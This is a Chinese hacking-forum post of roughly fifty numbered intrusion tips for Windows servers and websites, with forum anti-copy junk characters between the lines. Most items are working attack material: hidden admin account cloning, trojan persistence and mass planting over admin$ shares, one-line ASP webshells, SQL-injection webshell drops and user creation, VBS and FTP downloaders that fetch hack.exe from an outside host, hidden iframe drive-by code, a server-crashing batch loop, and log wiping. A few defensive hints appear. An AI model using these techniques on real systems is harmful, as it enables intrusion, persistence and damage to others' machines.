中国网络渗透测试联盟
标题:
一些笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:51
标题:
一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
4 B. ~6 s: N3 ?7 g
cacls C:\windows\system32 /G hqw20:R
O+ k" X' {& y' v0 W/ Q+ @
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
1 i) @6 ]0 d; F0 \' n& ]
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
$ L6 q8 l0 R7 s/ W5 ?" L' d$ a
2 a2 |7 s2 [0 g( p
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
/ F7 o4 T9 x6 s+ o7 V7 q2 F
2 F j9 J1 n6 i K5 ?- f1 p
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
, I) z" |, j* p) s2 P2 S& D
- E) A! A$ J, D6 c% g, W+ F
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
4 j9 z! i8 n1 a: Z
3 {: R# }3 _6 |2 t) o
5、利用INF文件来修改注册表
) V8 b/ h3 D& K+ M( q5 Y8 {
[Version]
$ A R. G3 T- u5 I
Signature="$CHICAGO$"
4 J0 z9 b( ]+ ~4 @, q
[Defaultinstall]
# x ?1 D" M# V, ^. e& P! r- I. z
addREG=Ating
6 h! u. F. r! A2 ?
[Ating]
4 i; R' \. L( @7 }* \
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
9 M" R- P' J: I4 i* P0 Q6 D3 J8 \
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
. E( a' m v8 e/ z+ p1 a
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
6 k# l4 k/ i/ I( @3 Q
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
) m0 l% U: v: V6 b+ F% C4 [* x
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
: O5 i& w/ D/ z$ p: U) d
HKEY_CURRENT_CONFIG 简写为 HKCC
# C t5 W8 P8 j
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
% Q. |) |5 F) S2 \) j% H
"1"这里代表是写入或删除注册表键值中的具体数据
+ V) y% V) r. [ W; I1 {5 z; |
6 [3 c+ G8 H. r( S& a5 H
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
, E$ i$ G8 n. M
多了一步就是在防火墙里添加个端口,然后导出其键值
. a5 O7 J* w3 T& n5 K. o# B
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
2 u6 t4 u9 g, M* t9 w( o; |
3 F, p$ f1 t' U: t1 {2 F
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
$ z8 @5 _7 V( v& T9 {2 l
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
+ r: V0 h+ A# h0 V: l
& `3 i% X: K6 E! o# _
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
( W- E2 E) K- ^
% Z6 x- h0 j3 d2 S% L9 n
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
# |! Q) C, e; E* [+ Y# N# R
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
0 P. X7 Y/ @3 G9 c
, g2 |# e, r0 K8 c1 ^$ u
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
5 G7 X5 V. D6 b
& I/ {# w C1 o9 Z: y: C
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
! H% O9 J# b- e; O" x; x
用法:xsniff –pass –hide –log pass.txt
: y& Q3 g( E" u0 ?* s2 H9 V) q$ A
5 X+ M- G6 z G; y
12、google搜索的艺术
l/ K7 o `( d; I+ M/ w
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
0 s% z# q# t9 B& @/ F- T
或“字符串的语法错误”可以找到很多sql注入漏洞。
) F* |+ `( Y$ _+ H( [
, T; W [+ j/ j' ?
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
' L' T% W. i" p5 N
6 c1 H3 j3 D0 q+ L# G) n' r
14、cmd中输入 nc –vv –l –p 1987
* p" A- ?7 T, m/ s; X( a8 P
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
3 z5 q# {& h$ V6 F# m
1 l1 g6 N% b; c7 @* X# D- b" s
15、制作T++木马,先写个ating.hta文件,内容为
) g4 v* ?1 @9 w7 |4 F
<script language="VBScript">
9 g0 Y! P3 l# W/ ^
set wshshell=createobject ("wscript.shell" )
6 K2 z. |5 T4 E" J: X. i
a=wshshell.run("你马的名称",1)
8 x: i8 s# a, r: q
window.close
& Q. q6 ~- R4 K! p6 P9 T5 h! W
</script>
! u6 B+ `/ S1 V
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
1 H8 B. T) R9 }7 A1 [: h7 ^
! C7 U" j7 ?: @4 t
16、搜索栏里输入
& W [3 L: z3 }* _# E, Z
关键字%'and 1=1 and '%'='
9 G5 ?+ A4 b W, i' i! u: o3 T4 \3 @3 P$ K
关键字%'and 1=2 and '%'='
4 N# e: S* g1 j2 o+ c
比较不同处 可以作为注入的特征字符
/ b/ `; m5 q7 I/ y# s
' n: Q" L2 f% K1 |2 g# G7 m7 t( U
17、挂马代码<html>
4 r; W' g6 u5 [' c' j1 J) ^' y6 m
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
3 f8 @4 ~7 @4 L) b" l/ i
</html>
: r% W/ ], i: ]' F
! b3 g2 s% t, P% X3 U$ y
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
7 Y1 S0 S1 L/ @! l& z2 g
net localgroup administrators还是可以看出Guest是管理员来。
. v5 G+ A; A x5 C
]2 `, J5 W# ?) W+ R* w# ]
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
% l. p0 Z. V3 a* h1 m3 G( c1 p
用法: 安装: instsrv.exe 服务名称 路径
7 n n8 U* Z5 u# K* w' }
卸载: instsrv.exe 服务名称 REMOVE
+ ]$ n& ?6 K* j. l! y [
: U, ]; y. A* r, Z x
3 v3 B# g1 b. K9 \; a
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
* w9 t/ p2 U! M' m; U3 J1 [7 g( j5 k! ]
不能注入时要第一时间想到%5c暴库。
5 @0 z+ w/ k$ m G( n$ t/ I* ~1 d
0 |7 ?& A5 i4 e8 o0 S) `
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
: s+ ^% }, b5 Y! w2 s( U7 h$ k
: q( H1 t. x+ l; V" P! A! q
23、缺少xp_cmdshell时
/ F$ q# b! S2 [+ q3 d
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
" D6 m: A5 G6 Z9 l: J, P
假如恢复不成功,可以尝试直接加用户(针对开3389的)
, U: [6 }* I" c8 |
declare @o int
3 O; {2 I- w2 s9 G0 w; |/ u3 C! Z
exec sp_oacreate 'wscript.shell',@o out
7 I8 u& t+ C v2 }; S
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
( W. {8 s! }6 g% x' d6 u
+ h% z4 f I! r- e
24.批量种植木马.bat
; S5 ]5 C2 f. l, x# s0 S, o1 X @) i
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
: n9 }) A5 k* t; D( y
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
. G8 S, G& }9 X
扫描地址.txt里每个主机名一行 用\\开头
1 b4 T, r: b9 x' o; w7 [
# Z/ \7 O* O$ c- [: z
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
, u5 F# Y/ V5 s2 Z. r f; x
d# s" I" y/ Z9 U$ c0 [7 L
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
9 x8 R, x* N, X0 `/ e T- u
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
8 P" a4 \1 \+ f" T8 Z! B
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
# l O* c) H4 u9 g6 O1 s
& a$ ~. \7 ~4 b) [1 ] Q
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
- K4 C/ `3 s, b# h
然后用#clear logg和#clear line vty *删除日志
3 Y$ u9 ] `/ a; O! p: q1 ~3 j
* R1 W2 v5 _) x
28、电脑坏了省去重新安装系统的方法
& n& j# [! |. R6 B/ c$ A# u3 g
纯dos下执行,
- f: H$ T) t0 |. @. b5 n
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
- Q' o0 Y [) [
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
: R& u" R5 }7 D( ?
/ n" z, J. U1 i' _. e1 Z5 x
29、解决TCP/IP筛选 在注册表里有三处,分别是:
( _$ k4 n2 S7 W. l. C% `1 ]6 b5 a
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
' t0 J" W/ F i7 ]& L
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
7 T: J! g% x" E
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: Z8 o6 ^" v- t6 S+ j, F8 ?6 O3 O
分别用
+ l" Q% P: W& ]
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. |) J! O/ b- w! d* I
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ U- I* X0 R# {4 u0 S& P. W
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
! g- X1 j" ]2 c2 N+ _
命令来导出注册表项
9 O' b, Z" [& a$ X) O
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
; K/ O/ ?7 ?1 _& S! X+ G
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
: z6 O5 }/ T( v; C
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
2 J! x& ? R$ a7 r
: D' k$ p0 e E0 }, @
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
: t7 j7 e% E6 `% s% Z) b
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
6 m @% E$ \/ ]0 h3 I1 ?
% L) J, S7 f9 E6 Y9 F7 L
31、全手工打造开3389工具
/ M7 e4 `, r& l; Y E0 Y& V2 P
打开记事本,编辑内容如下:
! s* i, s7 n% H5 N( X
echo [Components] > c:\sql
2 a% z! n. |1 F, f# y: A
echo TSEnable = on >> c:\sql
2 e# y& U. _$ X& P/ \+ T, k( x
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
- K' d7 t! T1 @. X& K P
编辑好后存为BAT文件,上传至肉鸡,执行
, P+ J' `& ^% _
5 M. w7 k; n3 X8 t8 X' I7 ~
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
' q$ S# w$ f/ ^: l N
3 \ q# X) [( i1 M N
33、让服务器重启
4 ?# T" a# \( ]$ k; x/ N
写个bat死循环:
5 X R! _- ]5 d, T
@echo off
A% g5 t+ A* k0 ?
:loop1
! A3 E! {/ A7 V" i- d# ~" e- m0 F# d3 ~
cls
& \8 x8 `* G. h4 O- c9 s4 X$ x
start cmd.exe
# W/ a+ m5 F8 d+ y9 j8 F
goto loop1
/ B9 ]- }8 S2 _
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
' Y2 T! H" i3 E- o
# a. f: n8 R$ ], R- d" B3 |
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
( ~( x' s# P4 ~1 g' t$ p6 w9 d% B+ E
@echo off
: b/ V$ g3 N- A) N+ A+ {1 E
date /t >c:/3389.txt
# a% e P$ n1 {' k8 p
time /t >>c:/3389.txt
; M" h* l* |2 G8 o
attrib +s +h c:/3389.bat
+ O$ O' ~$ v- g
attrib +s +h c:/3389.txt
: Z+ d8 x, L; i- n6 U
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
; q. l! C0 u0 m' H: f% o: e
并保存为3389.bat
' i/ D% w) K; i
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
( A$ c3 a2 d, H+ |8 C
6 K" x8 q) _1 C! v- V
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
% a0 L7 f6 b/ [2 b. S8 n
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
7 q/ @) Y9 @& M9 s8 z1 u1 n
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
/ c$ z) d. o) f/ x
2 D4 q8 ~) R2 s, P+ W, f1 W
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
' Q- g& ?2 \& F1 Q& z
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
/ ]) J9 f( ^! A8 U) X; ~
echo 你的FTP账号 >>c:\1.bat //输入账号
8 M9 S' @0 V! q, X/ ?
echo 你的FTP密码 >>c:\1.bat //输入密码
) z0 Y8 z+ g5 G
echo bin >>c:\1.bat //登入
9 ^ L( t: F' u3 @. o- T
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
6 T1 G g( E1 \7 G L9 X$ r
echo bye >>c:\1.bat //退出
4 s& X" h% Z( ?/ O Z
然后执行ftp -s:c:\1.bat即可
$ X1 k) j6 U* u6 z- R) F
0 k' {# v) y; h, k, @
37、修改注册表开3389两法
( \7 w U! c$ U& W3 _! T1 x2 E
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
# L$ \# C+ a% @9 m+ l
echo Windows Registry Editor Version 5.00 >>3389.reg
) p2 f. ]9 d! a7 c; K
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
. K9 T5 t7 ?5 [6 V! }
echo "Enabled"="0" >>3389.reg
4 L% ~5 A F1 t- G# X4 w+ s' P) y! H
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
4 [# ?4 m' s% V
NT\CurrentVersion\Winlogon] >>3389.reg
! o# s8 m8 K; ~% _0 Z9 k
echo "ShutdownWithoutLogon"="0" >>3389.reg
3 `* w+ }* T+ @& w2 _
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
8 z5 T( f0 ^: C) H
>>3389.reg
5 E1 a# }8 X8 P& g$ O8 m( p
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
) t0 \2 G; F D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
: b' z9 ]+ A0 j& E- u; q+ E
>>3389.reg
7 C: A( q; U. b2 }
echo "TSEnabled"=dword:00000001 >>3389.reg
& A1 o+ @2 Q0 P& W' I. P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
, n" [2 a: C6 [- A
echo "Start"=dword:00000002 >>3389.reg
6 Z8 `, F$ V: d: M) S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
9 a" A+ \3 ~( ~/ u6 j/ C
>>3389.reg
, n% d9 a& W$ }5 ]( ^! f
echo "Start"=dword:00000002 >>3389.reg
2 l O2 [# V8 o: T+ Q- S
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
* _# G2 D) h# d9 m. i/ D5 V& `
echo "Hotkey"="1" >>3389.reg
' L' L& o& i: k, J% n' A* v o+ [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% k+ E- v1 d5 o8 W, Q, @3 A) M
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
$ |$ k0 z0 Z% n2 D/ N/ x/ v
echo "PortNumber"=dword:00000D3D >>3389.reg
% ~- w9 }( x; K7 P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: T0 j% C2 L! ^2 I6 |7 ]3 S; B0 O0 B0 f
Server\WinStations\RDP-Tcp] >>3389.reg
5 L5 \7 ?0 d w; q& q- K, f: Z
echo "PortNumber"=dword:00000D3D >>3389.reg
: t+ l' Y' \% l" E& i7 o: }3 L
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
# d, d1 W) y- L) k8 Q! Q! ? w
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
! [8 K& U5 I% r% ?! H( E3 D8 u( \
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
- H$ \- H+ U0 t2 H7 k* d
(2)winxp和win2003终端开启
! F% n" g# l8 y1 a" I! U
用以下ECHO代码写一个REG文件:
3 k; |+ A% E5 y
echo Windows Registry Editor Version 5.00>>3389.reg
' _2 b: ^, N1 M* F1 A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# {8 A1 |' J' D% h
Server]>>3389.reg
6 V2 E4 K# D0 I, U. S( L4 o' b# v S
echo "fDenyTSConnections"=dword:00000000>>3389.reg
' C' Q1 y" G; |) t7 Z0 b# w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 \+ U# h+ C' B# W3 K" j9 i
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
- n/ D5 m7 o* B8 G b4 x, Y: p7 o
echo "PortNumber"=dword:00000d3d>>3389.reg
: o% a$ b* Y1 L* U& g# R& a: E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' t Q1 o: N" P- |# H
Server\WinStations\RDP-Tcp]>>3389.reg
4 i) `% e( @# n7 w4 C3 g% \
echo "PortNumber"=dword:00000d3d>>3389.reg
. [& M; W" o9 F. z
然后regedit /s 3389.reg del 3389.reg
$ }" ]; Z9 W9 n: X j
XP下不论开终端还是改终端端口都不需重启
" @% a0 w5 w$ Z% M7 a, v/ y ?
3 j# F# _+ s# M4 K8 y
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
8 l' L. b5 ^6 ~' w
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
) ?3 s. B; s4 v2 X6 E/ h. [ ]
9 R% h% \9 L+ u5 A& S
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
, O- D- @6 `* `+ I
(1)数据库文件名应复杂并要有特殊字符
6 W! c$ T8 Y! I% {( j a; q
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
# O/ Q0 @4 |5 a6 j! ^
将conn.asp文档中的
. P0 r3 j/ h$ j, y
DBPath = Server.MapPath("数据库.mdb")
- u; r+ e/ u2 n( }/ N
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
& x# B1 N9 L7 C2 \% \- a7 N
# o; D' Z- x1 V4 G
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
4 S+ _2 X$ _* ?/ Z4 Z
(3)不放在WEB目录里
( s- t. L4 c0 p* v6 d
& \- t/ N. e+ |0 X# y) ^
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
B; T/ i7 D# R% I- c; w
可以写两个bat文件
* N6 ^: R; M: g m' G% m
@echo off
% m& n9 [: \5 w/ `! n/ T
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
, r, d4 e% B1 }$ j
@del c:\winnt\system32\query.exe
) I) l2 \/ s0 k0 Y! M# D
@del %SYSTEMROOT%\system32\dllcache\query.exe
5 b, v) l7 J3 }: K+ r' G9 i
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
) u8 m) E" l1 Z2 n% @
; y" L( t) @7 ~; P% K* B4 Y
@echo off
, |+ m( j8 N% O7 u) N
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
6 u+ W- _2 X5 A5 t z
@del c:\winnt\system32\tsadmin.exe
5 g. r& x2 f0 S3 B
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
& J, U, g4 u" K& i; w3 P8 @
1 l! k8 k" Z: a) s9 h2 ?+ c
41、映射对方盘符
- c9 i) p& R; Z. \
telnet到他的机器上,
3 ]( D3 O2 Y5 j( w
net share 查看有没有默认共享 如果没有,那么就接着运行
' Z% [% R$ Y. _
net share c$=c:
+ U2 y0 y. X- P
net share现在有c$
, d. I) V2 u5 H. h# d( t+ t* j
在自己的机器上运行
/ R, [0 j3 R! f) j
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
4 D! B3 E6 x) v9 i- _1 ~2 z( _# l
4 e) t% N' s: i7 x6 a
42、一些很有用的老知识
2 a' E' W$ _/ W3 z0 `* S
type c:\boot.ini ( 查看系统版本 )
* t! c9 V/ b- } o+ p
net start (查看已经启动的服务)
9 C! G6 }1 V+ g; R# r8 m
query user ( 查看当前终端连接 )
! L! p4 N H4 ^4 t- ~& P
net user ( 查看当前用户 )
. l+ M' c1 O. E4 g* U
net user 用户 密码/add ( 建立账号 )
: {: l$ B1 ~: ^# x5 o8 Y
net localgroup administrators 用户 /add (提升某用户为管理员)
. [* u' p0 n- R/ z9 b6 L0 m' [
ipconfig -all ( 查看IP什么的 )
2 `- T# k0 k: L/ n; O/ i
netstat -an ( 查看当前网络状态 )
. }& l! T# V2 @0 m
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
) W. J, ?/ p0 F7 D8 V% ]
克隆时Administrator对应1F4
$ F- f1 _2 Q2 [3 \, I3 _, P. I
guest对应1F5
8 u- f" H p; `9 Z
tsinternetuser对应3E8
T% M$ o0 z& [; ], R" l9 Y# r2 Z
, T5 q* t& y& s( S
43、如果对方没开3389,但是装了Remote Administrator Service
7 p& r: j. g5 \ a% g1 o
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
@ E6 G( i, R: ] c
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
" U7 h7 [% \: ]9 e5 \
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
- G0 J" E5 ^# P/ l9 ?' I$ t3 D
/ I5 M: I! L3 e! S, b$ l; {# |: M& b: b
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
0 T( Y4 h/ j/ Q/ E7 Q0 Q
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
9 j1 l7 ]' r, k6 U6 O! ?
* H) H* F- `/ j: w$ H2 j: U1 G& z
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
3 l6 X- C, C2 q
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
4 u d: D3 C9 v: `
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
3 T! t k E! T4 H% V# Z8 q! `+ Y
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
# R- ]7 Z" R' |) x8 F
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
7 u* V/ \/ {5 s5 ]
(这是完整的一句话,其中没有换行符)
# D6 u7 d5 m6 G. ~
然后下载:
5 y9 ]9 G; d5 C- Y
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
A& r$ |/ f* I5 u% L( s
R+ v6 o1 B. a2 W, Y
46、一句话木马成功依赖于两个条件:
; Q# c# F' Q1 p! D! p
1、服务端没有禁止adodb.Stream或FSO组件
% V" v8 C0 K8 |6 |
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
% C* _0 B! g& P/ k7 D7 j
/ ]0 V& B) Q0 @7 a9 Y
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
* d, {2 i" k7 W2 i, Z, Y6 A0 A
;alter database utsz set RECOVERY FULL--
) q0 E- k1 u3 Y y5 H+ x4 ^2 E
;create table cmd (a image)--
& `( ] q& T6 b' P
;backup log utsz to disk = 'D:\cmd' with init--
3 E. x' F# {6 O9 o/ G
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
0 a! E$ O4 W: F6 n
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
; ^" i5 Y& U$ A) `6 |0 f. Q
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
. B: I2 N/ [9 h* W! V5 r
8 h$ Z7 n+ d- j) @: \* B
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
! E, \; c+ x% |4 b
4 {; m# g6 W( o4 R {
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
: n6 Z5 J7 W3 B
所有会话用 'all'。
) K `& E3 }1 n0 }
-s sessionid 列出会话的信息。
% ]- D1 N7 T3 D; X+ W* z
-k sessionid 终止会话。
& v% u" i! s1 D0 z
-m sessionid 发送消息到会话。
) j& W0 X1 h% Q z1 S! L
: a4 c3 W0 X& |6 n! A, S
config 配置 telnet 服务器参数。
( Q/ x# [+ @5 q: u
0 r$ d# T( i2 S Z) I6 }2 z4 c/ \
common_options 为:
! f. S- q2 ~9 C2 ]+ u
-u user 指定要使用其凭据的用户
, t! Y3 j8 ?6 \
-p password 用户密码
! M0 s9 `2 x/ K: d, z
5 a! l4 O8 y) ` H2 f
config_options 为:
; Q4 b/ L7 B8 Z
dom = domain 设定用户的默认域
7 f) p* R2 k; `" R- ]
ctrlakeymap = yes|no 设定 ALT 键的映射
( @6 S! Q; I" |6 y' R5 m
timeout = hh:mm:ss 设定空闲会话超时值
1 Y" a* f8 \! l
timeoutactive = yes|no 启用空闲会话。
2 J. k8 t1 k U) j2 I. M) E4 z
maxfail = attempts 设定断开前失败的登录企图数。
. d; s8 `7 ?, t* Q- P9 r
maxconn = connections 设定最大连接数。
1 a! E8 T) b/ @& J
port = number 设定 telnet 端口。
0 U$ U; v( x H2 [
sec = [+/-]NTLM [+/-]passwd
4 N- p& _5 j9 g+ Q
设定身份验证机构
' u( w# s. W0 {
fname = file 指定审计文件名。
( N/ B! `8 L: ?
fsize = size 指定审计文件的最大尺寸(MB)。
" E3 Z6 K4 W9 k
mode = console|stream 指定操作模式。
`6 H, d1 E7 X; [/ t& O
auditlocation = eventlog|file|both
/ i- L( D" X$ [' p
指定记录地点
' O3 O7 H1 `" {
audit = [+/-]user [+/-]fail [+/-]admin
: W9 U! \8 m$ P
4 j; L. K6 U: y7 |+ v
49、例如:在IE上访问:
" w6 }/ V) T2 ]( f9 M
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
3 y- K _; ^$ l
hack.txt里面的代码是:
6 E& J: E) J% X
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
( W C+ q( r* g, `3 K) |
把这个hack.txt发到你空间就可以了!
5 X, ^, l. k" n
这个可以利用来做网马哦!
% L- {& @7 E- I
. U) ^# u: g4 L$ u+ d& q
50、autorun的病毒可以通过手动限制!
" E& G( |" n! U
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
! [, W8 q, m) ]4 A: ]* N
2,打开盘符用右键打开!切忌双击盘符~
) u/ P: d6 h; X. n$ A
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
1 ?" A e/ j8 H% z! @
( ^ c: Y+ K& i9 V" Q& X0 f
51、log备份时的一句话木马:
7 a( L p) o4 ~' j! S
a).<%%25Execute(request("go"))%%25>
( R( a' ~& S4 H3 {3 v6 y
b).<%Execute(request("go"))%>
" j/ q |/ _5 r' @" M* I# G0 b: r5 h
c).%><%execute request("go")%><%
# P2 t& ?5 N: k6 [2 U# c) ^7 V3 P
